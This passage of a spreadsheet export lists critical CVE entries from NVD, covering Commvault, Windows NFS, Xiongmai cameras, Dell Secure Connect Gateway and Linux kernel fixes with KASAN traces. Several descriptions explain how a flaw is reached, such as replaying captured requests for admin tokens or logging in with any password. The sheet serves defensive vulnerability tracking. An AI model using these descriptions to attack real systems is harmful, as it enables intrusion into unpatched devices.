      <c r="J28" s="5" t="inlineStr"/>
      <c r="K28" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr"/>
      <c r="Q28" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>Private Metrics Server contained an SQL injection condition affecting database operations. Software customers upgrade to resolved maintenance release. Update Private Metrics Server.</t>
        </is>
      </c>
      <c r="S28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77098</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78445</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K29" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L29" s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr"/>
      <c r="Q29" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78445</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79395</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr"/>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr"/>
      <c r="Q30" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>An improper authentication vulnerability in the WS-Security (wsse:UsernameToken) verification routine within the Sofia IPC daemon in Xiongmai IP Camera XM530 firmware HMT.CM2005-v220608.1837 and earlier allows remote attackers to bypass authentication and execute privileged ONVIF actions (including PTZ control, stream URL retrieval, and system reboot) via a crafted SOAP request supplying the admin username with any arbitrary password when the account's stored password is empty.</t>
        </is>
      </c>
      <c r="S30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79395</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79396</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr"/>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr"/>
      <c r="Q31" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>Use of hardcoded default credentials in Xiongmai IP Camera XM530 firmware HMT.CM2005-v220608.1837 and earlier stores static account credentials in unencrypted plaintext within bin/config.xml and compiled into the Sofia executable, allowing remote attackers to gain full administrative control over the camera.</t>
        </is>
      </c>
      <c r="S31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79396</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79689</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr"/>
      <c r="K32" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L32" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr"/>
      <c r="Q32" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to script injection.</t>
        </is>
      </c>
      <c r="S32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79689</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79941</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr"/>
      <c r="K33" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L33" s="5" t="inlineStr"/>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr"/>
      <c r="Q33" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to script injection.</t>
        </is>
      </c>
      <c r="S33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79941</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80172</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr"/>
      <c r="K34" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L34" s="5" t="inlineStr"/>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr"/>
      <c r="Q34" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Insufficient Verification of Data Authenticity vulnerability. An unauthenticated attacker with remote access could exploit this, leading to unauthorized access. This vulnerability is considered critical as an unauthenticated attacker can repeatedly reuse a captured request to generate ADMIN access and refresh tokens. Since there is no nonce validation or time limit on requests, the attack can be performed indefinitely. Dell recommends customers to upgrade at the earliest opportunity</t>
        </is>
      </c>
      <c r="S34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80172</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80926</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr"/>
      <c r="K35" s="5" t="inlineStr"/>
      <c r="L35" s="5" t="inlineStr"/>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr"/>
      <c r="Q35" s="5" t="inlineStr"/>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ksmbd: fix use-after-free in oplock break notification
smb2_oplock_break_noti() reads opinfo-&gt;conn without any lock and
dereferences it after two allocations which may sleep.  When the
durable handle owning the oplock is disconnected, session_fd_check()
clears opinfo-&gt;conn and drops its conn reference under ci-&gt;m_lock, and
the last ksmbd_conn_put() frees the connection.  A break triggered by
another connection that races with the teardown can then resurrect the
freed connection: ksmbd_conn_get() is a plain atomic_inc, and the
queued break work later dereferences the stale conn via
ksmbd_conn_write(), a use-after-free reachable by any authenticated
client holding a durable batch oplock.
Thread the caller's inode into the notification path instead of taking
a new reference on it.  Every caller of oplock_break() already holds a
live ksmbd_file (or an explicit ksmbd_inode_lookup_lock() reference,
in the parent lease break paths) on the inode that owns the break
target's oplock list, so ci cannot be freed during the call, and its
lock can be taken without dereferencing opinfo-&gt;o_fp, which a
concurrent close may free.  Select and pin the connection under
ci-&gt;m_lock, the same lock session_fd_check() and
ksmbd_reopen_durable_fd() use to update opinfo-&gt;conn, so a concurrent
detach either loses the race to the clear or keeps the connection
alive until the notification work releases it.  Transfer the reference
to the work item and release it on allocation failures.</t>
        </is>
      </c>
      <c r="S35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80926</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80976</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr"/>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr"/>
      <c r="Q36" s="5" t="inlineStr"/>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
seg6: reset IP6CB after IPv6 decapsulation
decap_and_validate() pulls the outer SRv6 headers and makes the inner
packet the skb network header. The IPv6 control block still contains
values collected while parsing the outer packet, including nhoff and
extension-header flags.
End.DX6 and End.DT6 route the inner IPv6 packet directly to the IPv6
input path. An unprivileged user can reach End.DT6 from a user and net
namespace by installing a local SID and injecting an outer packet with
Hop-by-Hop and Destination Options headers followed by an SRH and a
minimal inner IPv6 packet.
The outer extension headers leave a large nhoff in IP6CB. After
decapsulation, ip6_protocol_deliver_rcu() uses that stale offset on the
inner packet and reads beyond the skb head. KASAN reports:
  BUG: KASAN: slab-out-of-bounds in ip6_protocol_deliver_rcu
  ip6_protocol_deliver_rcu+0x1118/0x1450
  ip6_input_finish+0x11b/0x240
  seg6_local_input_core+0xed/0x2e0
  lwtunnel_input+0x1e9/0x4e0
  ipv6_rthdr_rcv+0x525f/0x6c50
  ip6_protocol_deliver_rcu+0xcb7/0x1450
Before clearing IP6CB for an inner IPv6 packet, save its incoming
interface index and L3 slave state. Restore both after the clear and set
nhoff to the inner IPv6 base-header nexthdr field.
Use IP6CB(skb)-&gt;iif rather than skb-&gt;skb_iif because VRF processing can
replace skb_iif with the L3 master while IP6CB keeps the receiving
interface. Preserve IP6SKB_L3SLAVE for the same reason.</t>
        </is>
      </c>
      <c r="S36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80976</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80980</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr"/>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr"/>
      <c r="Q37" s="5" t="inlineStr"/>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/smc: stop killed, freed and out_of_sync sharing a byte
The three connection state flags are single-bit bitfields, so they occupy
one byte of struct smc_connection and every store to one is a
read-modify-write of the other two:
    u8  killed : 1;
    u8  freed : 1;
    u8  out_of_sync : 1;
They are not written under a common lock. smc_cdc_msg_validate() sets
out_of_sync from the receive tasklet, while smc_conn_kill() sets killed
from process context under lock_sock(), and the receive path does not defer
to the backlog when the socket is owned -- smc_cdc_msg_recv() takes only
bh_lock_sock().
Give each flag its own byte so a store no longer touches its neighbours.
All readers test them as booleans and are unchanged. struct smc_connection
grows by two bytes.</t>
        </is>
      </c>
      <c r="S37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80980</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80981</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr"/>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr"/>
      <c r="Q38" s="5" t="inlineStr"/>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/smc: fix use-after-free of the LLC qentry in smc_llc_srv_add_link()
smc_llc_srv_add_link() keeps add_llc pointing into the queue entry:
  add_llc = &amp;qentry-&gt;msg.add_link;			smc_llc.c:1482
  ...
  smc_llc_save_add_link_info(link_new, add_llc);	smc_llc.c:1494
  smc_llc_flow_qentry_del(&amp;lgr-&gt;llc_flow_lcl);		smc_llc.c:1495
  ...
  u8 *llc_msg = smc_link_shared_v2_rxbuf(link) ?
	(u8 *)lgr-&gt;wr_rx_buf_v2 : (u8 *)add_llc;	smc_llc.c:1504
  smc_llc_save_add_link_rkeys(link, link_new, llc_msg);	smc_llc.c:1506
smc_llc_flow_qentry_del() kfree()s the entry, so on a link without a shared
v2 receive buffer the pointer handed to smc_llc_save_add_link_rkeys() is
already freed. Before the Fixes: commit that branch always used
lgr-&gt;wr_rx_buf_v2 and add_llc was not used after the free.
Reproduced on an unpatched tree over rxe, with KASAN, kasan_multi_shot
and a link forced to max_recv_sge == 1: the entry is freed and read by
the same call, and the freeing frame is smc_llc_srv_add_link() itself.
  [    2.523161] BUG: KASAN: slab-use-after-free in smc_llc_save_add_link_rkeys+0x333/0x350
  [    2.523499] Read of size 2 at addr ffff8880052194de by task kworker/0:1/11
  [    2.523789]
  [    2.523862] CPU: 0 UID: 0 PID: 11 Comm: kworker/0:1 Not tainted 7.2.0-rc5-p0-g2c9dd296545d #35 PREEMPT(lazy)
  [    2.523865] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
  [    2.523866] Workqueue: smc_hs_wq smc_listen_work
  [    2.523869] Call Trace:
  [    2.523870]  &lt;TASK&gt;
  [    2.523871]  dump_stack_lvl+0x53/0x70
  [    2.523872]  print_report+0xd0/0x630
  [    2.523874]  ? __pfx__raw_spin_lock_irqsave+0x10/0x10
  [    2.523876]  ? smc_llc_save_add_link_rkeys+0x333/0x350
  [    2.523878]  kasan_report+0xce/0x100
  [    2.523879]  ? smc_llc_save_add_link_rkeys+0x333/0x350
  [    2.523881]  smc_llc_save_add_link_rkeys+0x333/0x350
  [    2.523883]  ? smcr_buf_reg_lgr+0x2a4/0x660
  [    2.523885]  smc_llc_srv_add_link+0xaa2/0x1e50
  [    2.523888]  ? _printk+0xba/0xf0
  [    2.523897]  ? __pfx_smc_llc_srv_add_link+0x10/0x10
  [    2.523899]  ? down_write+0xb0/0x130
  [    2.523903]  ? __pfx_down_write+0x10/0x10
  [    2.523905]  smc_listen_work+0x489e/0x4d00
  [    2.523907]  ? kmem_cache_free+0x1c6/0x3a0
  [    2.523911]  ? __pfx_smc_listen_work+0x10/0x10
  [    2.523913]  ? release_sock+0x148/0x1d0
  [    2.523915]  ? smc_tcp_listen_work+0xb4f/0xfc0
  [    2.523917]  ? _raw_spin_lock_irq+0x80/0xe0
  [    2.523918]  ? __pfx__raw_spin_lock_irq+0x10/0x10
  [    2.523920]  process_one_work+0x633/0x1030
  [    2.523922]  ? assign_work+0x11d/0x370
  [    2.523924]  worker_thread+0x45b/0xd10
  [    2.523926]  ? __pfx_worker_thread+0x10/0x10
  [    2.523928]  ? __pfx_worker_thread+0x10/0x10
  [    2.523929]  kthread+0x2c6/0x3b0
  [    2.523931]  ? recalc_sigpending+0x15c/0x1e0
  [    2.523934]  ? __pfx_kthread+0x10/0x10
  [    2.523935]  ret_from_fork+0x36e/0x5a0
  [    2.523937]  ? __pfx_ret_from_fork+0x10/0x10
  [    2.523938]  ? __switch_to+0x572/0xdd0
  [    2.523943]  ? __pfx_kthread+0x10/0x10
  [    2.523944]  ret_from_fork_asm+0x1a/0x30
  [    2.523947]  &lt;/TASK&gt;
  [    2.523948]
  [    2.531253] Allocated by task 48:
  [    2.531399]  kasan_save_stack+0x33/0x60
  [    2.531570]  kasan_save_track+0x14/0x30
  [    2.531737]  __kasan_kmalloc+0x8f/0xa0
  [    2.531905]  __kmalloc_cache_noprof+0x158/0x370
  [    2.532100]  smc_llc_enqueue+0x72/0x560
  [    2.532268]  smc_wr_rx_tasklet_fn+0x474/0xa80
  [    2.532491]  tasklet_action_common+0x20f/0x8a0
  [    2.532714]  handle_softirqs+0x18e/0x590
  [    2.532886]  do_softirq+0x3b/0x60
  [    2.533036]  __local_bh_enable_ip+0x61/0x70
  [    2.533221]  __alloc_skb+0x732/0x890
  [    2.533384]  rxe_init_packet+0x16b/0x4f0
  [    2.533567]  prepare_ack_packet+0xb8/0x830
  [    2.533760]  rxe_receiver+0x495/0x96e0
  [    2.533933]  do_work+0x144/0x470
  [    2
---truncated---</t>
        </is>
      </c>
      <c r="S38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80981</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80986</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr"/>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr"/>
      <c r="Q39" s="5" t="inlineStr"/>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/smc: bound the peer rkey counts in SMC-Rv2 LLC messages
On a link whose device has max_recv_sge == 1 there is no shared v2 receive
buffer, and smc_llc_save_add_link_rkeys() takes the v2 extension from 44
bytes past the start of the queue entry's inline message:
  ext = (struct smc_llc_msg_add_link_v2_ext *)(llc_msg + SMC_WR_TX_SIZE);
The entry is a 72-byte allocation and the extension starts at offset 68, so
ext-&gt;num_rkeys at offset 94 is already past it. This happens on every
SMC-Rv2 link addition, whatever the peer sends:
  [    2.490065] BUG: KASAN: slab-out-of-bounds in smc_llc_save_add_link_rkeys+0x333/0x350
  [    2.490431] Read of size 2 at addr ffff8880056406de by task smctest/106
  [    2.490709]
  [    2.490792] CPU: 0 UID: 0 PID: 106 Comm: smctest Not tainted 7.2.0-rc5-p1-g77a5d9d9c99f #32 PREEMPT(lazy)
  [    2.490795] Hardware name: QEMU Ubuntu 24.04 PC v2 (i440FX + PIIX, arch_caps fix, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014
  [    2.490798] Call Trace:
  [    2.490803]  &lt;TASK&gt;
  [    2.490805]  dump_stack_lvl+0x53/0x70
  [    2.490810]  print_report+0xd0/0x630
  [    2.490828]  ? __pfx__raw_spin_lock_irqsave+0x10/0x10
  [    2.490832]  ? smc_llc_save_add_link_rkeys+0x333/0x350
  [    2.490834]  kasan_report+0xce/0x100
  [    2.490836]  ? smc_llc_save_add_link_rkeys+0x333/0x350
  [    2.490837]  smc_llc_save_add_link_rkeys+0x333/0x350
  [    2.490839]  ? smcr_buf_map_lgr+0x1bf/0x2b0
  [    2.490844]  smc_llc_cli_add_link+0xca7/0x1e80
  [    2.490848]  ? smc_llc_wait+0x355/0x810
  [    2.490850]  ? __pfx_smc_llc_wait+0x10/0x10
  [    2.490851]  ? __pfx_smc_llc_cli_add_link+0x10/0x10
  [    2.490853]  ? __pfx_autoremove_wake_function+0x10/0x10
  [    2.490863]  __smc_connect+0x3f5c/0x4980
  [    2.490873]  ? __pfx_kernel_connect+0x10/0x10
  [    2.490888]  ? __pfx___smc_connect+0x10/0x10
  [    2.490891]  ? release_sock+0x148/0x1d0
  [    2.490894]  smc_connect+0x42c/0x580
  [    2.490896]  __sys_connect+0xfc/0x130
  [    2.490898]  ? __pfx___sys_connect+0x10/0x10
  [    2.490900]  ? handle_mm_fault+0x1a1/0x430
  [    2.490908]  __x64_sys_connect+0x6d/0xb0
  [    2.490909]  ? fpregs_assert_state_consistent+0x56/0xe0
  [    2.490917]  do_syscall_64+0xf9/0x540
  [    2.490921]  entry_SYSCALL_64_after_hwframe+0x77/0x7f
  [    2.490924] RIP: 0033:0x421bb4
